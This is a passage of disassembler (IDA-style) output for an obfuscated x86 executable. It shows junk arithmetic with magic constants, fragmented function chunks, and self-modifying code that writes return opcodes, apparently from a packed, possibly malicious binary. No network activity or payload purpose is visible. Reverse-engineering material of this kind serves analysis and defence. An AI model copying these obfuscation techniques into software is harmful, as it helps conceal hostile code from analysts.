; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_43BBAD:				; CODE XREF: sub_445CCD+A500j
		jmp	loc_45895C
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43BBB2:				; CODE XREF: sub_43F227+A0F4j
		jmp	loc_45032E
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_43BBB7:				; CODE XREF: sub_45AAC8-15139j
		jmp	loc_448C54
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_43BBBC:				; CODE XREF: sub_44E4A6:loc_43C26Cj
		add	ebx, ebp
		add	ebx, 48B9CB53h
		mov	[ebx], eax
		pop	ebx
		push	ecx
		push	7102EFAAh
		jmp	loc_449022
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_449192
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F71

loc_43BBD8:				; CODE XREF: sub_455F71+56FCj
		jl	loc_44C996

loc_43BBDE:				; CODE XREF: sub_455F71:loc_45B661j
		add	edi, 5473C2Dh
		xchg	edi, [esp+0]
		jmp	loc_441162
; END OF FUNCTION CHUNK	FOR sub_455F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_43BBEC:				; CODE XREF: sub_457F50-6666j
		or	edi, 8322CAA2h
		cmp	edi, 4895418Bh
		jmp	loc_45A7BF
; END OF FUNCTION CHUNK	FOR sub_457F50
; ---------------------------------------------------------------------------
		push	81EA33D8h
		jmp	loc_442640
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_43BC07:				; CODE XREF: sub_44E34F:loc_457328j
		jnz	loc_455A1C
		jmp	loc_440C3F
; END OF FUNCTION CHUNK	FOR sub_44E34F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346F

loc_43BC12:				; CODE XREF: sub_44346F:loc_44D2E1j
		jz	loc_44A0A1
		jmp	loc_43E14E
; END OF FUNCTION CHUNK	FOR sub_44346F
; ---------------------------------------------------------------------------
		test	edi, ebx
		jmp	loc_44A79F
; ---------------------------------------------------------------------------

loc_43BC24:				; DATA XREF: sub_439498+3o
		mov	eax, [eax]
		add	eax, [ebp-4]
		call	sub_44F66B
		cmp	eax, [ebp-8]
		jnz	loc_454A9B
		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		add	eax, [ebp-4]
		jmp	loc_43E6E0
; ---------------------------------------------------------------------------
		jg	loc_44A7F7
		jmp	loc_453EF6
; ---------------------------------------------------------------------------

loc_43BC50:				; CODE XREF: hvvrg7ie:loc_459839j
		push	edx
		push	offset loc_4425AE
		jmp	loc_4409A8
; ---------------------------------------------------------------------------

loc_43BC5B:				; DATA XREF: sub_445DC4+3EC4o
		mov	eax, [esp]
		push	edx
		push	edx
		push	0E37CCFFEh
		jmp	loc_444025
; ---------------------------------------------------------------------------

loc_43BC6A:				; CODE XREF: hvvrg7ie:0045B8DBj
		xchg	ebp, [esp]
		mov	edi, ebp
		pop	ebp
		lea	eax, loc_43C271
		mov	byte ptr [eax],	0C3h
		jmp	loc_43B3B9

; =============== S U B	R O U T	I N E =======================================



sub_43BC7E	proc near		; CODE XREF: sub_41A45D+A5p
					; sub_41A45D+1B6p ...
		call	sub_445CCD
		jmp	ds:off_41D018
sub_43BC7E	endp

; ---------------------------------------------------------------------------

loc_43BC89:				; CODE XREF: hvvrg7ie:00446730j
		or	ecx, 99249CB4h
		test	ebp, edx
		jmp	loc_440D86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DA8

loc_43BC96:				; CODE XREF: sub_455DA8:loc_4597CEj
		jnb	loc_44945B
		test	edi, ebx
		jmp	loc_44944B
; END OF FUNCTION CHUNK	FOR sub_455DA8
; ---------------------------------------------------------------------------
		cdq
		rol	eax, 6
		jmp	sub_43EBB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43BCAC:				; CODE XREF: sub_43F227+678Aj
		shl	edx, 1Fh
		mov	ebp, 79E24C5Fh
; END OF FUNCTION CHUNK	FOR sub_43F227
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43BCB4:				; CODE XREF: sub_44D2F8-13B31j
					; sub_44D2F8-13315j ...
		push	offset loc_44D8A5
		jmp	loc_44F75F
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4453EC

loc_43BCBE:				; CODE XREF: sub_4453EC:loc_452D17j
		pop	esi
		push	ecx
		pushf
		push	49CE8247h
		pop	ecx
		or	ecx, 0B479A150h
		xor	ecx, 32A46341h
		cmp	ecx, 0BA1800A5h
		jmp	loc_44EC3D
; END OF FUNCTION CHUNK	FOR sub_4453EC
; ---------------------------------------------------------------------------

loc_43BCDE:				; CODE XREF: hvvrg7ie:0044664Bj
		sub	edx, 0C1F8E1C1h
		or	edx, ds:4000F1h
		rol	edx, 11h
		add	edx, 346904Bh
		xchg	edx, [esp]
		jmp	loc_44CDD6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43BCFB:				; CODE XREF: sub_4465A6:loc_454C4Fj
		test	eax, eax
		jz	loc_456B5D
		jmp	loc_44DD7B
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_43BD08:				; CODE XREF: sub_45488E:loc_455B4Bj
		jz	loc_4466B0
		jmp	loc_43E3B2
; END OF FUNCTION CHUNK	FOR sub_45488E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_420. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43BD14:				; CODE XREF: hvvrg7ie:0045749Aj
		jmp	loc_45A555
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_43BD19:				; CODE XREF: sub_43FC15+17153j
		jnz	loc_454325
		jmp	loc_443020
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------

loc_43BD24:				; CODE XREF: hvvrg7ie:loc_453201j
		xor	eax, 71A3ABFCh
		or	eax, ds:4000F9h
		rol	eax, 12h
		xor	eax, 0B1217553h
		push	eax
; START	OF FUNCTION CHUNK FOR sub_4417B1

loc_43BD3A:				; CODE XREF: sub_4417B1:loc_454956j
		mov	eax, ebx
		jmp	loc_44232F
; END OF FUNCTION CHUNK	FOR sub_4417B1
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_44BB4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_43BD47:				; CODE XREF: sub_440643:loc_44EC83j
		or	eax, 0C3F9964Eh
		cmp	eax, 8EBAB315h
		jmp	loc_453B36
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_43BD58:				; CODE XREF: sub_45038B-26A5j
		shl	edx, 3
		mov	[ebx], eax
		cmp	eax, 92BC5711h
		jmp	loc_44B12A
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------

loc_43BD68:				; CODE XREF: hvvrg7ie:0044FF4Aj
		jno	loc_44177E
		xchg	ebx, ebp
		mov	ecx, 0A47CC58Dh
		test	ecx, 2F8B5F13h
		jmp	loc_442525
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43BD80:				; CODE XREF: sub_44D2F8+4457j
		not	ebp
		mov	edi, 0A5FB3545h
		jmp	loc_44E9EF
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_43BD8C:				; CODE XREF: hvvrg7ie:0045942Aj
		shl	eax, 1Ah

; =============== S U B	R O U T	I N E =======================================



sub_43BD8F	proc near		; CODE XREF: sub_4427B2+Dp

; FUNCTION CHUNK AT 00457F05 SIZE 0000001A BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, offset dword_4578BC
		push	edx
		push	0BC9BD6CFh
		pop	edx
		and	edx, 0A92CF2F6h
		jmp	loc_457F05
sub_43BD8F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_43BDAA:				; CODE XREF: sub_44BFF5-B1BEj
		jz	loc_45A4D7

loc_43BDB0:				; CODE XREF: hvvrg7ie:loc_442D35j
		push	0DBF196CEh
		xor	edx, ebp
		or	eax, 42B3A059h
		jmp	loc_447520
; END OF FUNCTION CHUNK	FOR sub_44BFF5

; =============== S U B	R O U T	I N E =======================================



sub_43BDC2	proc near		; DATA XREF: hvvrg7ie:00449F9Ao

; FUNCTION CHUNK AT 0043BA8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440699 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044489D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445A13 SIZE 00000017 BYTES

		mov	esp, ebp

loc_43BDC4:				; CODE XREF: hvvrg7ie:00442221j
		xchg	edx, [esp+0]
		mov	ebp, edx
		pop	edx
		jmp	loc_44489D
sub_43BDC2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43BDCF	proc near		; CODE XREF: hvvrg7ie:0043A43Dj
					; sub_44440B:loc_44BBC6p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00442E10 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443B25 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044F4A3 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	ebx, 0BF3D1A9Dh
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_44F4A3
sub_43BDCF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	sub_44E1C9
; START	OF FUNCTION CHUNK FOR sub_43D574

loc_43BDE6:				; CODE XREF: sub_43D574+194D2j
		jmp	loc_449E48
; END OF FUNCTION CHUNK	FOR sub_43D574
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FFD8

loc_43BDEB:				; CODE XREF: sub_44FFD8:loc_44FFEBj
		jmp	loc_43B556
; END OF FUNCTION CHUNK	FOR sub_44FFD8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_43BDF0:				; CODE XREF: sub_4500FA-B80Fj
		jnz	loc_43E4BD
		add	eax, 0B7AE26Dh
		jle	loc_45841E
		jmp	loc_43E4BD
; END OF FUNCTION CHUNK	FOR sub_4500FA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_348. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_43BE08:				; CODE XREF: sub_445934+11F3Cj
		jmp	loc_44FC8C
; END OF FUNCTION CHUNK	FOR sub_445934
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_43BE0D:				; CODE XREF: sub_458F33-13575j
		jo	loc_4583FC
		jnz	loc_43D96F
		cmp	ecx, 0B67B91D6h
		jmp	loc_449917
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------

loc_43BE24:				; DATA XREF: sub_450FF2-147EBo
		mov	al, 1
		call	sub_43EA21

loc_43BE2B:				; CODE XREF: hvvrg7ie:00452904j
		jmp	locret_43F503
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_43BE30:				; CODE XREF: sub_440643+C1D7j
		jnp	loc_459A52
		jno	loc_444CEB
		jmp	loc_44CBC3
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_43BE41:				; CODE XREF: sub_43D531:loc_455F23j
		jnz	loc_442ABE
		jmp	loc_43A1FF
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D980

loc_43BE4C:				; CODE XREF: sub_43D980+14j
		push	0C1B6B1D1h
		pop	edx
		add	edx, 0B09A656Dh
		rol	edx, 17h
		jmp	loc_439C45
; END OF FUNCTION CHUNK	FOR sub_43D980
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_43BE60:				; CODE XREF: sub_450AA8:loc_43DC26j
					; sub_450AA8+3E1Cj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_444BA8
		jmp	loc_4429AA
; END OF FUNCTION CHUNK	FOR sub_450AA8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_419. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43BE72:				; CODE XREF: sub_43F227-3A9j
		jmp	nullsub_239
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_43BE77:				; CODE XREF: sub_4484E1:loc_446187j
		jbe	loc_4519BC
		adc	esi, 5B3F75C1h
		xor	esi, 0F312CE88h
		test	edx, edi
		jmp	loc_4416B0
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471CA

loc_43BE90:				; CODE XREF: sub_4471CA+11C26j
		mov	ds:off_41D084, eax
		lea	eax, sub_45046B
		mov	byte ptr [eax],	0C3h
		jmp	loc_44B4E5
; END OF FUNCTION CHUNK	FOR sub_4471CA
; ---------------------------------------------------------------------------
		call	nullsub_509
		jmp	ds:dword_41D088
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F91

loc_43BEAF:				; CODE XREF: sub_446F91+12A4Cj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_446F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451482

loc_43BEB4:				; CODE XREF: sub_451482+1Aj
		jmp	loc_458F38
; END OF FUNCTION CHUNK	FOR sub_451482
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_509. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		and	esi, 0E90000A9h
		jecxz	short loc_43BF00
		add	[eax], eax
; START	OF FUNCTION CHUNK FOR sub_4551B7

loc_43BEC4:				; CODE XREF: sub_4551B7-28E5j
		ror	edx, 12h

loc_43BEC7:				; CODE XREF: sub_4551B7:loc_4528CBj
		and	ebx, 0FD4DA92Bh
		rol	ebx, 1Bh
		add	ebx, 0B5B9920Fh
		jmp	loc_440499
; END OF FUNCTION CHUNK	FOR sub_4551B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_43BEDB:				; CODE XREF: sub_452F0E+Cj
		push	edi
		push	6B9AD399h
		pop	edi
		or	edi, 7AD1CFE6h
		cmp	edi, 1B8C3E26h
		jmp	loc_44A5AF
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B5C

loc_43BEF3:				; CODE XREF: sub_442B5C:loc_44C05Cj
		jge	loc_43E424

loc_43BEF9:				; CODE XREF: sub_45889B-15BE2j
		jmp	nullsub_5
; END OF FUNCTION CHUNK	FOR sub_442B5C
; ---------------------------------------------------------------------------
		dw 0CFC1h
; ---------------------------------------------------------------------------

loc_43BF00:				; CODE XREF: hvvrg7ie:0043BEC0j
		add	ecx, [edi]
		xchg	edi, [ecx+ebp*4]
		add	[eax], eax
		and	ebx, ebp
		jmp	loc_43E419
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_227. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43BF0F:				; CODE XREF: hvvrg7ie:0045A4EDj
		jmp	loc_43B16C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_43BF14:				; CODE XREF: sub_43E128+1BE3Cj
		jmp	nullsub_25
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B4CA

loc_43BF19:				; CODE XREF: sub_44B4CA+10j
		jmp	loc_44BA83
; END OF FUNCTION CHUNK	FOR sub_44B4CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C1B

loc_43BF1E:				; CODE XREF: sub_456C1B-153E7j
		jmp	nullsub_254
; END OF FUNCTION CHUNK	FOR sub_456C1B

; =============== S U B	R O U T	I N E =======================================



sub_43BF23	proc near		; CODE XREF: sub_457C82:loc_457C87j

; FUNCTION CHUNK AT 004410A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451804 SIZE 0000001C BYTES

		add	esp, 0FFFFFFF0h
		call	sub_44DE0A
		mov	edx, 0CB39536Bh
		push	esi
		push	2AA3DF42h

loc_43BF36:				; CODE XREF: sub_448BC0+91E4j
		pop	esi
		jmp	loc_451804
sub_43BF23	endp

; ---------------------------------------------------------------------------

loc_43BF3C:				; CODE XREF: hvvrg7ie:0043D1E0j
		jg	loc_44A1D8

loc_43BF42:				; CODE XREF: hvvrg7ie:loc_449827j
		push	offset sub_44FCCD
		jmp	locret_445E50
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_146. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_43BF4D:				; CODE XREF: sub_45488E-E1C6j
		jmp	loc_447051
; END OF FUNCTION CHUNK	FOR sub_45488E

; =============== S U B	R O U T	I N E =======================================



sub_43BF52	proc near		; DATA XREF: hvvrg7ie:00458343o

var_4		= dword	ptr -4

		push	ecx
		push	0DB30663Bh
		pop	ecx
		add	ecx, 0EEC3D0B1h
		or	ecx, 6B31FC03h
		xor	ecx, 3C5F9333h
		add	ecx, 289AC17Eh
		xchg	ecx, [esp+4+var_4]
		jmp	sub_446A16
sub_43BF52	endp

; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_458EC6
		jmp	loc_449047
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_43BF86:				; CODE XREF: sub_45A234-20849j
		jnp	loc_444E1E

loc_43BF8C:				; CODE XREF: sub_439814+1C1j
		xor	ebx, 0D427B285h
		add	ebx, 18D7C17Ah
		xchg	ebx, [esp+0]
		mov	eax, [ebp+8]
		push	eax
		call	sub_4584F2
		jmp	loc_439E33
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_43BFA9:				; CODE XREF: sub_440643+C35Dj
		jnz	loc_43E0BC
		jmp	loc_44AEEC
; END OF FUNCTION CHUNK	FOR sub_440643

; =============== S U B	R O U T	I N E =======================================



sub_43BFB4	proc near		; CODE XREF: hvvrg7ie:004416D8j
					; sub_4500FA-8FDEp

; FUNCTION CHUNK AT 0043CD23 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00448015 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450AE3 SIZE 00000012 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	ecx, ebp
		add	ecx, 0B644161h
		mov	ecx, [ecx]
		and	ecx, 7
		push	8098DC84h
		jmp	loc_448015
sub_43BFB4	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43BFCF	proc near		; DATA XREF: sub_44CC1E:loc_44FDE4o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C4A2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043CD9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441E12 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FE59 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458D9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E5F SIZE 00000019 BYTES

		push	esi
		push	56679C21h
		pop	esi
		add	esi, 0FFF8DBAFh
		cmp	esi, 0CCCB7145h
		jmp	loc_441E12
sub_43BFCF	endp


; =============== S U B	R O U T	I N E =======================================



sub_43BFE7	proc near		; DATA XREF: sub_448DE4-E4Do

; FUNCTION CHUNK AT 0043C974 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043FDC8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00443BF7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044854B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045003B SIZE 00000006 BYTES

		mov	[esi], eax
		pop	esi
		lea	eax, [ebp-12Dh]
		mov	[ebp-28h], eax

loc_43BFF3:				; CODE XREF: hvvrg7ie:00441472j
		push	0FC44B9F5h
		jmp	loc_443BF7
sub_43BFE7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_43BFFD:				; CODE XREF: sub_43D531:loc_43917Cj
		mov	ebp, [ebx]

loc_43BFFF:				; CODE XREF: hvvrg7ie:loc_444A4Bj
		and	esi, ebp
		pushf
		and	edi, 0F3E7B2A4h
		sub	esi, ebp
		jmp	loc_457BA7
; END OF FUNCTION CHUNK	FOR sub_43D531

; =============== S U B	R O U T	I N E =======================================



sub_43C00F	proc near		; DATA XREF: sub_45AA38:loc_43A380o
		cmp	eax, 0FFFFFFFFh
		jz	loc_45A807
		mov	eax, [eax]
		jmp	loc_449D56
sub_43C00F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44048E

loc_43C01F:				; CODE XREF: sub_44048Ej
		or	eax, eax
		jz	loc_45A807
		push	offset sub_45A7F7
		jmp	loc_43FE96
; END OF FUNCTION CHUNK	FOR sub_44048E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_43C031:				; CODE XREF: sub_44388C:loc_45136Ej
		jnz	loc_43F472
		jmp	loc_445297
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
		xchg	ecx, [ebp+0]
		add	ecx, ebp
; START	OF FUNCTION CHUNK FOR sub_447D56

loc_43C041:				; CODE XREF: sub_447D56:loc_44CDF5j
		jmp	sub_4422A8
; END OF FUNCTION CHUNK	FOR sub_447D56
; ---------------------------------------------------------------------------

loc_43C046:				; CODE XREF: hvvrg7ie:004467EEj
		mov	edi, ecx

; =============== S U B	R O U T	I N E =======================================



sub_43C048	proc near		; CODE XREF: sub_454789+4p
		xchg	edi, [esp+0]
		pop	edi
		mov	[ebp-1Ch], eax
		jmp	loc_44DF9B
sub_43C048	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_43C054:				; CODE XREF: sub_450246:loc_446CD6j
		cmp	dword ptr [ebp-20h], 0
		jmp	loc_449B3C
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------

loc_43C05D:				; CODE XREF: hvvrg7ie:0044E2C2j
		jbe	loc_444451

loc_43C063:				; CODE XREF: hvvrg7ie:loc_44F731j
		call	nullsub_505
		retn
; ---------------------------------------------------------------------------

loc_43C069:				; CODE XREF: hvvrg7ie:loc_45B16Ej
		call	sub_439549
		jmp	loc_43E562
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_43C073:				; CODE XREF: sub_4484E1:loc_44DD20j
		jnz	loc_442C37
		jmp	loc_45B13B
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AEE1

loc_43C07E:				; CODE XREF: sub_45AEE1-1BEF2j
		rol	ecx, 1Bh
		popf
; END OF FUNCTION CHUNK	FOR sub_45AEE1
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_43C082:				; CODE XREF: sub_4405D7+Aj
					; sub_440C05+19j ...
		jmp	loc_45B58B
; ---------------------------------------------------------------------------

loc_43C087:				; CODE XREF: sub_45AEE1:loc_454880j
					; sub_440C05:loc_45537Cj
		xchg	esi, [esp+0]
		jmp	loc_4392DA
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_43C08F:				; CODE XREF: sub_4512A0-172Fj
		jl	loc_43F35F
		jnp	loc_459CCF
		and	eax, 6634631Eh

loc_43C0A1:				; CODE XREF: hvvrg7ie:loc_440456j
		or	edi, 0C380832Bh
		and	edi, 0D66F3EF7h
		xor	edi, 69FABB65h
		add	eax, edi
		push	offset sub_4481B6
		jmp	loc_44141F
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_43C0BF:				; CODE XREF: sub_4408AE+13540j
		not	ebx
		jz	loc_44624B
		mov	ecx, [ebx]
		test	edx, ebx
		jmp	loc_45718E
; END OF FUNCTION CHUNK	FOR sub_4408AE

; =============== S U B	R O U T	I N E =======================================



sub_43C0D0	proc near		; DATA XREF: sub_456E27-110DEo

; FUNCTION CHUNK AT 0043FB6D SIZE 00000005 BYTES

		add	edi, 495C7677h
		xchg	edi, [esp+0]
		jmp	loc_43FB6D
sub_43C0D0	endp


; =============== S U B	R O U T	I N E =======================================



sub_43C0DE	proc near		; CODE XREF: sub_41764F+52p
					; DATA XREF: _1fieagrn:off_41D00Co

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004390C8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00439BFF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00439F6A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043AB27 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043B7FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CE7C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D1E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D280 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D92D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043ED91 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442E65 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00443266 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444C83 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004451C9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004454E7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446A5A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447D1B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448498 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044954F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044AD9E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044CCB3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044CDD0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E8B0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FE97 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451F32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004521A6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453C38 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456AE7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004587BF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004598D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459D78 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A0F4 SIZE 00000017 BYTES

		jno	loc_439F6A
		mov	eax, ds:dword_4563B8
		or	eax, eax
		jnz	loc_45A0F4
		jmp	loc_4549AC
sub_43C0DE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43C0F7:				; CODE XREF: hvvrg7ie:00456802j
		popf
		jns	loc_4459B0
		jmp	loc_454F05
; ---------------------------------------------------------------------------
		adc	esi, 33F20919h
		jmp	loc_44E3B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43C10E:				; CODE XREF: sub_43D285:loc_454A86j
		add	esi, 0EECE39B1h
		popf
		xchg	esi, [esp+0]
		jmp	sub_456A52
; END OF FUNCTION CHUNK	FOR sub_43D285
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_548. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456E27

loc_43C11E:				; CODE XREF: sub_456E27-110D9j
		jmp	nullsub_496
; END OF FUNCTION CHUNK	FOR sub_456E27
; ---------------------------------------------------------------------------

loc_43C123:				; DATA XREF: sub_4562B0-54C1o
		mov	eax, [ebp+8]
		test	byte ptr [eax-8], 8
		setnz	al
		call	sub_447079
		jmp	loc_4515D6
; ---------------------------------------------------------------------------

locret_43C137:				; CODE XREF: hvvrg7ie:00447A72j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_43C138:				; CODE XREF: sub_44CEC8-128D7j
		jmp	loc_45A59A
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45046B

loc_43C13D:				; CODE XREF: sub_45046B:loc_450470j
		and	edi, 0FA65E102h
		sub	edi, 10751FA7h
		add	edi, 0A0584BFBh
